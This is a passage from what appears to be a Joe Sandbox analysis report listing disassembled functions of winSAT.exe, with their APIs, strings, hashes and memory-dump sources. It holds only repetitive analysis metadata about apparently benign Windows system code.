                                                                                                                                                                                              • Opcode Fuzzy Hash: a643dc333af21f37e50e7a871fa087e6123769e1657eee19d4dd45b9c6d09fa8
                                                                                                                                                                                              • Instruction Fuzzy Hash: C7011621A2C98292FB50FB51E8553B9E760FB89714FE08132D84E463A5DF7CE546DB20
                                                                                                                                                                                              Function 00007FF781018B90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Window$ClassDestroyHandleModuleUnregister
                                                                                                                                                                                              • String ID: DXBaseWndClass
                                                                                                                                                                                              • API String ID: 2062980464-1627930235
                                                                                                                                                                                              • Opcode ID: 6a33f93008c59709ea45dc29a3114777f7d76b567a7850cf908ee937bc14cf7d
                                                                                                                                                                                              • Instruction ID: 3d210f6ad265ccc135044484768e23cc993645774b8a435c19ede33e33a49548
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a33f93008c59709ea45dc29a3114777f7d76b567a7850cf908ee937bc14cf7d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 06F0BD24909A41C7EB447B11FC49378FAA0BF89B41FE58575C80E46354DFBCA486C720
                                                                                                                                                                                              Function 00007FF780F92C40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 17COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                              • API String ID: 1480402491-1866435925
                                                                                                                                                                                              • Opcode ID: 8cb58790b58ab467bcc7e3ea0a14476c89f40f39509891f662cf516678b2cb94
                                                                                                                                                                                              • Instruction ID: 6f9179b965b784f14c0c64b5337785d8ae2f33e32ae9cc93f235d235633ecc1d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8cb58790b58ab467bcc7e3ea0a14476c89f40f39509891f662cf516678b2cb94
                                                                                                                                                                                              • Instruction Fuzzy Hash: 31D05E62E2DA4691EF10FB01E8510A9F331BB48780FF08131E58D06675EF7CE609C720
                                                                                                                                                                                              Function 00007FF780FA5CF4 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memmove_s$ExceptionThrow
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2739672242-0
                                                                                                                                                                                              • Opcode ID: 3fba23a301cc8c3eddab57c5273ec03d0a44ea304a795512a211ec270c906cf3
                                                                                                                                                                                              • Instruction ID: fe0440283739f694f645a39a284b00e89581bb648ee32aca6cc261fb9ee3db2c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fba23a301cc8c3eddab57c5273ec03d0a44ea304a795512a211ec270c906cf3
                                                                                                                                                                                              • Instruction Fuzzy Hash: BE71E362B19B8A86DE04DB56E908578E296FB44FD8BA99531CE2E07BC0DF7CF051C310
                                                                                                                                                                                              Function 00007FF780FCFAA8 Relevance: 7.7, APIs: 5, Instructions: 198COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memmove_s$ExceptionThrow
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2739672242-0
                                                                                                                                                                                              • Opcode ID: b6b418e09d3768c06b4364c57f6690a10db974ced1ae4a904b1b914e5f3f3e5d
                                                                                                                                                                                              • Instruction ID: 38af729c2d0a29d0cb6e4138b76557cf7e745de44ef1774bdfdd4cd54ec90601
                                                                                                                                                                                              • Opcode Fuzzy Hash: b6b418e09d3768c06b4364c57f6690a10db974ced1ae4a904b1b914e5f3f3e5d
                                                                                                                                                                                              • Instruction Fuzzy Hash: EF61AF21B19B5782EE28AB26A9150B8E791BF84BE4BA48531CE5E07BD0DF7DF505C310
                                                                                                                                                                                              Function 00007FF780F9D560 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 193COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: StringType$ExceptionThrow
                                                                                                                                                                                              • String ID: ERROR: $cannot save assessment results$config$moobe
                                                                                                                                                                                              • API String ID: 3817088620-962671459
                                                                                                                                                                                              • Opcode ID: ef07d88d6789d606896970b21f26944f48c94aeef73d3e740e48e52cf08e4863
                                                                                                                                                                                              • Instruction ID: fa093c692c0b857e3ac4fb2447ab5f6968275d4cf39bc8439eb3e510a68632c4
                                                                                                                                                                                              • Opcode Fuzzy Hash: ef07d88d6789d606896970b21f26944f48c94aeef73d3e740e48e52cf08e4863
                                                                                                                                                                                              • Instruction Fuzzy Hash: E0817622A1CA4682EB10AB12D8402B9E7A0FF81B94FB49031EA5E57BD6DF7CF545C750
                                                                                                                                                                                              Function 00007FF780FCE694 Relevance: 7.6, APIs: 5, Instructions: 136threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$CurrentEnabledEnterEventLeaveThread_vsnwprintf_s
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3495192508-0
                                                                                                                                                                                              • Opcode ID: 3cf63db9f0e59f2383468d886ec8bcb73490454f5f6a3f8f9637a7fd78a6f077
                                                                                                                                                                                              • Instruction ID: 32bd3d08127df455a76e869d0a25d39afc5c1b7997a7bf50450b2227a0fd7a11
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cf63db9f0e59f2383468d886ec8bcb73490454f5f6a3f8f9637a7fd78a6f077
                                                                                                                                                                                              • Instruction Fuzzy Hash: C1514D32A1CB9286E720AF15F8412A9F7A0FB85760FA08535DA9D43BE4DF7CE445CB10
                                                                                                                                                                                              Function 00007FF780FCEDC4 Relevance: 7.6, APIs: 5, Instructions: 118threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$CurrentEnabledEnterEventLeaveThread_vsnwprintf_s
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3495192508-0
                                                                                                                                                                                              • Opcode ID: 65a7c28a3c581d82b51d6db7cb14b553ef75fe7dc15b4eb1b2a5e2d69983c850
                                                                                                                                                                                              • Instruction ID: 2472d509d875c6d13798e75f6807e15f1206b5c9dacb0d53d021eb1f9dee8dcc
                                                                                                                                                                                              • Opcode Fuzzy Hash: 65a7c28a3c581d82b51d6db7cb14b553ef75fe7dc15b4eb1b2a5e2d69983c850
                                                                                                                                                                                              • Instruction Fuzzy Hash: 31516E32A18A8286E720AF55F841279F7A1FB85760FA48235DAAD477E4DF7CE405CB10
                                                                                                                                                                                              Function 00007FF780FC3C50 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 109COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ClassObject
                                                                                                                                                                                              • String ID: $base\winsat\exe\processresults.cpp
                                                                                                                                                                                              • API String ID: 1165159591-75052694
                                                                                                                                                                                              • Opcode ID: d7f3694650f63706994aba093e4ee3e8e277766314f2b333fb01905add428965
                                                                                                                                                                                              • Instruction ID: 4c6545838644e3bc0e0750a875a5c5d99d2498d44bc2775f256b53174b8cf4b8
                                                                                                                                                                                              • Opcode Fuzzy Hash: d7f3694650f63706994aba093e4ee3e8e277766314f2b333fb01905add428965
                                                                                                                                                                                              • Instruction Fuzzy Hash: E4419C22A0C61381EF54FB26D8513F8A360BF40BE8FA4A131E91E4A7D6DE6CF445D360
                                                                                                                                                                                              Function 00007FF780F97CEC Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 91COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780F97E4A
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780F97E61
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: GetModuleHandleW.KERNEL32(?,?,00000001,00007FF780F94E15), ref: 00007FF780FDC71A
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: FindResourceW.KERNEL32 ref: 00007FF780FDC79D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: SizeofResource.KERNEL32 ref: 00007FF780FDC7BE
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LoadResource.KERNEL32 ref: 00007FF780FDC7D8
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LockResource.KERNEL32 ref: 00007FF780FDC7F0
                                                                                                                                                                                                • Part of subcall function 00007FF780FA9C0C: __uncaught_exception.MSVCRT ref: 00007FF780FA9DE6
                                                                                                                                                                                                • Part of subcall function 00007FF780FA2944: __uncaught_exception.MSVCRT ref: 00007FF780FA2A2B
                                                                                                                                                                                                • Part of subcall function 00007FF780FA9904: __uncaught_exception.MSVCRT ref: 00007FF780FA9BB3
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE41F
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetCurrentProcessId.KERNEL32 ref: 00007FF780FCE440
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetTickCount.KERNEL32 ref: 00007FF780FCE459
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _snprintf_s.MSVCRT ref: 00007FF780FCE48C
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _vsnprintf_s.MSVCRT ref: 00007FF780FCE4DB
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE500
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$__uncaught_exception$EnabledEventExceptionThrow$CountCurrentFindHandleLoadLockModuleProcessSizeofTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: ERROR: $ERROR: can't create disk assessment command line: %S$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1437627868-237364375
                                                                                                                                                                                              • Opcode ID: 66356b93c4b9199996322b215f815dc2237bbf6a538ed612d1d23e7a547f123c
                                                                                                                                                                                              • Instruction ID: 828374e7a1994827b15a9e87866aa276c9a6dc318fd7b3b9ae35d5d5131329f8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 66356b93c4b9199996322b215f815dc2237bbf6a538ed612d1d23e7a547f123c
                                                                                                                                                                                              • Instruction Fuzzy Hash: A931A021B1DA4251EF20FB12E8513F9E360BF84764FE09231E55E467E6DE2CE546C720
                                                                                                                                                                                              Function 00007FF780FA0F0C Relevance: 7.6, APIs: 5, Instructions: 90COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalDeleteErrorLastSection$CloseHandle
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 36034308-0
                                                                                                                                                                                              • Opcode ID: 17f6e93139ca0091c0acb73751de62a59af2fd879c623ca0014e65f27d04e256
                                                                                                                                                                                              • Instruction ID: bf988fd2cd731059ccebef6b6b7c74ffedd487efef60ae46458545cd3b586c6d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 17f6e93139ca0091c0acb73751de62a59af2fd879c623ca0014e65f27d04e256
                                                                                                                                                                                              • Instruction Fuzzy Hash: 42414E36515B8185E710AF35E84036CB368FB85FA8F685232DAAD477D9CF389455C720
                                                                                                                                                                                              Function 00007FF7810A541C Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String___lc_codepage_func___lc_handle_func__crt__pctype_funcislower
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2887104122-0
                                                                                                                                                                                              • Opcode ID: 513183af688463c922d6058260b713486da6a2e9eeb88ac3efa0be5f7b4a1a61
                                                                                                                                                                                              • Instruction ID: 23c85dd3c12613486353cad9867b1cfaa11b24a16890fb34f743b0f3eb20c31f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 513183af688463c922d6058260b713486da6a2e9eeb88ac3efa0be5f7b4a1a61
                                                                                                                                                                                              • Instruction Fuzzy Hash: F031B922B0C6C185F7316B12A85437DFAA2FB40795FA84035DADE87A55DEBCD444CB30
                                                                                                                                                                                              Function 00007FF7810A5204 Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String___lc_codepage_func___lc_handle_func__crt__pctype_funcisupper
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3436188357-0
                                                                                                                                                                                              • Opcode ID: 2ed22352c66a72016be7a2d05b652327256152e6cf59997da84d85d8e94dcf7d
                                                                                                                                                                                              • Instruction ID: d6a96cc87f80c23a876bdc0ea2f21419954471086439990c30dd24a817a8377b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ed22352c66a72016be7a2d05b652327256152e6cf59997da84d85d8e94dcf7d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C319632A0C68186F7216B15A84436DFAA2FB95790FB44035FACA83795DFBCD485CB30
                                                                                                                                                                                              Function 00007FF780FDC5D8 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC608
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC658
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC66C
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC6BA
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC508: GetProcessHeap.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC50C
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC508: HeapAlloc.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC526
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalHeapSection$AllocEnterErrorFileLastLeaveModuleNameProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2639094630-0
                                                                                                                                                                                              • Opcode ID: b4a040d96479d5300f5f38a9d29bc469aa1d65dc6435333e0e4c961135dff68c
                                                                                                                                                                                              • Instruction ID: e7ef0c3b016e8036dd5fb207480948eeb4d73891e0b7cc1183a396c650631a4e
                                                                                                                                                                                              • Opcode Fuzzy Hash: b4a040d96479d5300f5f38a9d29bc469aa1d65dc6435333e0e4c961135dff68c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 04316E25F0DA428AEB00BB15F984179FBA1FB48B80FF49135CA4D82794DF6DF446CA60
                                                                                                                                                                                              Function 00007FF780FF30FC Relevance: 7.6, APIs: 5, Instructions: 61synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseEventHandle$CreateObjectSingleWait
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3433744922-0
                                                                                                                                                                                              • Opcode ID: e494b141a370285409be853caa0db7a8f57cc79e3356de9a06fd6396216cb5ea
                                                                                                                                                                                              • Instruction ID: 578ec50b62137a0af1d73a793f168a192a6c2dfc7763cbde1cb5c911edbc8c80
                                                                                                                                                                                              • Opcode Fuzzy Hash: e494b141a370285409be853caa0db7a8f57cc79e3356de9a06fd6396216cb5ea
                                                                                                                                                                                              • Instruction Fuzzy Hash: F5316D32A08A81D7EB449F21D9453A8B7A0FB45B59FA88231CB1D077D4CF78E4A4C710
                                                                                                                                                                                              Function 00007FF7810A5328 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
